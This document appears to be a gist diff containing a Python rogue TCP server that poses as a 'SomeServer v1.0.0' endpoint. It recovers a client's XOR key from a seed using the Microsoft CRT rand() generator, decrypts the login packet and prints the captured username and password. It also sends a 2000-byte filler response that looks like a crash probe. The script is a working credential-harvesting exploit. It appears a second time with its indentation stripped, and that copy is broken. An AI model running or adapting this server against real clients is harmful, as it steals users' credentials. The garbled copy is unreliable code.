lowlevel01 · December 21, 2025 17:20
diff --git a/gistfile1.txt b/gistfile1.txt
 import socket

 # ==========================================================
 # Microsoft CRT PRNG (rand)
 # ==========================================================

 class microsoft_rand_prng:
    def __init__(self):
        self._state = 0

    def srand(self, seed):
        self._state = seed & 0xFFFFFFFF

    def rand(self):
        self._state = (self._state * 0x343fd + 0x269ec3) & 0xffffffff
        return (self._state >> 16) & 0x7fff


 def generate_key_from_le_seed(seed_le_bytes):
    seed_value = (
        seed_le_bytes[0]
        | (seed_le_bytes[1] << 8)
        | (seed_le_bytes[2] << 16)
        | (seed_le_bytes[3] << 24)
    )

    print(f"[DEBUG] Seed LE bytes : {seed_le_bytes}")
    print(f"[DEBUG] Seed value    : 0x{seed_value:08x}")

    prng = microsoft_rand_prng()
    prng.srand(seed_value)

    return [(prng.rand() & 0xFF) for _ in range(256)]


 def decrypt_data(encrypted_data, key):
    return bytes(encrypted_data[i] ^ key[i % 256] for i in range(len(encrypted_data)))


 def parse_credentials(decrypted):
    if decrypted[:2] != b"\x02\x00":
        raise ValueError("Bad creds packet ID")

    # username
    u_end = 2
    while decrypted[u_end] != 0:
        u_end += 1
    username = decrypted[2:u_end].decode("ascii", errors="ignore")

    # password
    p_start = u_end
    while decrypted[p_start] == 0:
        p_start += 1
    p_end = p_start
    while decrypted[p_end] != 0:
        p_end += 1
    password = decrypted[p_start:p_end].decode("ascii", errors="ignore")

    return username, password


 # ==========================================================
 # TCP Server
 # ==========================================================

 host = "0.0.0.0"
 port = 4443

 s_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 s_server.bind((host, port))
 s_server.listen(2)

 print(f"Server started: {host}:{port}")

 while True:
    conn, addr = s_server.accept()
    print(f"\n[+] Connection from {addr}")

    n = 0
    seed_le = None
    key = None

    while True:
        raw = conn.recv(4096)
        if not raw:
            break

        data_hex = raw.hex()
        data_bytes = list(raw)

        if n == 0:
            print(f"[CLIENT HELLO] {data_hex}")

            ServerHello = (
                "00000000000000000000000060fc8f00536f6d655365727665722076312e302e3000"
                "ffffb8fc8f00520ae0000c01000049000000d2fc8f000000000000000000"
                "490000004900000001000000a8f2ca00"
            )
            response = bytes.fromhex(ServerHello)
            
        elif n == 1:
            print(f"[SEED PACKET] {data_hex}")
            # Expected: 01 00 <seed 4 bytes LE>
            seed_le = data_bytes[2:6]
            key = generate_key_from_le_seed(seed_le)
            AnswerToKey = "00000000d51a0000"
            response = bytes.fromhex(AnswerToKey)
            

        elif n == 2:
            print(f"[ENCRYPTED CREDS] {data_hex}")

            decrypted = decrypt_data(data_bytes, key)

            print("[DECRYPTED HEX]")
            print(decrypted.hex(" "))

            try:
                username, password = parse_credentials(decrypted)
                print("\n[!!! CREDENTIALS EXTRACTED !!!]")
                print("Username :", username)
                print("Password :", password)
            except Exception as e:
                print("[ERROR]", e)
            

            #response = b""  # no reply needed
            #response = decrypt_data(bytes.fromhex("0A000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"), key)
            response = bytes.fromhex("c5bbf81b")
        else:
            response = bytes.fromhex("0A"*2000)

        if response:
            conn.send(response)

        n += 1

    conn.close()
	import socket

	# ==========================================================
	# Microsoft CRT PRNG (rand)
	# ==========================================================

	class microsoft_rand_prng:
	def __init__(self):
	self._state = 0

	def srand(self, seed):
	self._state = seed & 0xFFFFFFFF

	def rand(self):
	self._state = (self._state * 0x343fd + 0x269ec3) & 0xffffffff
	return (self._state >> 16) & 0x7fff


	def generate_key_from_le_seed(seed_le_bytes):
	seed_value = (
	seed_le_bytes[0]
	\| (seed_le_bytes[1] << 8)
	\| (seed_le_bytes[2] << 16)
	\| (seed_le_bytes[3] << 24)
	)

	print(f"[DEBUG] Seed LE bytes : {seed_le_bytes}")
	print(f"[DEBUG] Seed value : 0x{seed_value:08x}")

	prng = microsoft_rand_prng()
	prng.srand(seed_value)

	return [(prng.rand() & 0xFF) for _ in range(256)]


	def decrypt_data(encrypted_data, key):
	return bytes(encrypted_data[i] ^ key[i % 256] for i in range(len(encrypted_data)))


	def parse_credentials(decrypted):
	if decrypted[:2] != b"\x02\x00":
	raise ValueError("Bad creds packet ID")

	# username
	u_end = 2
	while decrypted[u_end] != 0:
	u_end += 1
	username = decrypted[2:u_end].decode("ascii", errors="ignore")

	# password
	p_start = u_end
	while decrypted[p_start] == 0:
	p_start += 1
	p_end = p_start
	while decrypted[p_end] != 0:
	p_end += 1
	password = decrypted[p_start:p_end].decode("ascii", errors="ignore")

	return username, password


	# ==========================================================
	# TCP Server
	# ==========================================================

	host = "0.0.0.0"
	port = 4443

	s_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s_server.bind((host, port))
	s_server.listen(2)

	print(f"Server started: {host}:{port}")

	while True:
	conn, addr = s_server.accept()
	print(f"\n[+] Connection from {addr}")

	n = 0
	seed_le = None
	key = None

	while True:
	raw = conn.recv(4096)
	if not raw:
	break

	data_hex = raw.hex()
	data_bytes = list(raw)

	if n == 0:
	print(f"[CLIENT HELLO] {data_hex}")

	ServerHello = (
	"00000000000000000000000060fc8f00536f6d655365727665722076312e302e3000"
	"ffffb8fc8f00520ae0000c01000049000000d2fc8f000000000000000000"
	"490000004900000001000000a8f2ca00"
	)
	response = bytes.fromhex(ServerHello)

	elif n == 1:
	print(f"[SEED PACKET] {data_hex}")
	# Expected: 01 00 <seed 4 bytes LE>
	seed_le = data_bytes[2:6]
	key = generate_key_from_le_seed(seed_le)
	AnswerToKey = "00000000d51a0000"
	response = bytes.fromhex(AnswerToKey)


	elif n == 2:
	print(f"[ENCRYPTED CREDS] {data_hex}")

	decrypted = decrypt_data(data_bytes, key)

	print("[DECRYPTED HEX]")
	print(decrypted.hex(" "))

	try:
	username, password = parse_credentials(decrypted)
	print("\n[!!! CREDENTIALS EXTRACTED !!!]")
	print("Username :", username)
	print("Password :", password)
	except Exception as e:
	print("[ERROR]", e)


	#response = b"" # no reply needed
	#response = decrypt_data(bytes.fromhex("0A000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"), key)
	response = bytes.fromhex("c5bbf81b")
	else:
	response = bytes.fromhex("0A"*2000)

	if response:
	conn.send(response)

	n += 1

	conn.close()
No results found